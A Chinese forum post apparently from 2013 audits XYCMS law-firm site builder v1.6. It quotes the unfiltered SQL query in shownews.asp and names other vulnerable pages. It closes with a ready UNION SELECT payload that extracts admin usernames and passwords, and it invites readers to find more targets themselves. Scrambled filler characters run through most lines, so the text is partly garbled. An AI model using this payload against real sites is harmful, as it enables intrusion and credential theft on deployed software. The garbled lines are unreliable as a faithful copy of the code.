前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似# u& T* n8 n1 H1 M( J8 X. r9 o/ h
) e: u6 k" x4 \! Z1 P% i
淫荡分割线
6 x! r1 ~$ f4 y3 N& P3 S--------------------------------------------------------7 C( Z, v0 M F; I9 X2 A1 b
* c& A% x3 t2 L% Q" z
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
U! M! c7 R- H- H源码地址:http://down.chinaz.com/soft/29233.htm
' Y/ C( c" |: E) s) A _# x( T1 j- O3 o# T6 c6 J% t% {
漏洞文件:shownews.asp$ z5 i6 r3 P3 a0 h8 h( s
漏洞代码:7-13行
) l- o) r: x5 R8 l: Y
5 }# b. c+ {0 B" `- M+ W0 M s
$ Z* z& L/ h1 d+ L* b<% : @% z: Y3 ?+ |4 T6 j
id=request.QueryString("id")7 Z# W+ I: C/ ^. O& V7 A R% E m
! G6 S4 k( W+ s4 f* c& k4 nset snews=server.createobject("adodb.recordset")
2 A8 D; q. h# N: ~. @% Hexec="select * from [news] where id="&id* X+ G$ n- n) d) B4 G
snews.open exec,conn,1,1
2 f+ q$ F0 ]) r# _& s; i% R%>) U' b8 D; x$ f' v7 A
" R+ G" x: I& K5 i
+ e! E1 H) D7 X6 z( `: M( X什么过滤都没有 直造成注入
$ x" ~5 B6 P8 J. X1 f/ l; ^
! D! y: l1 a; W4 R6 u注入点:http://127.0.0.1:99/shownews.asp?id=xx2 b- n9 y( c9 J0 V& N2 G
) [! Q. S7 T- T# p8 z
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找! Q" V$ L' M9 N" [3 @3 D) V
* a5 E& y7 [+ z T2 i I, K . J4 T/ ]2 M, C$ k' O
exp: union select 1,admin,password,4,5,7 from admin_user
7 ^" f; z, i U1 ]$ y; R" O# [" I, \- c3 f; |
|
发表于 2013-4-4 17:28:12
收藏
支持
反对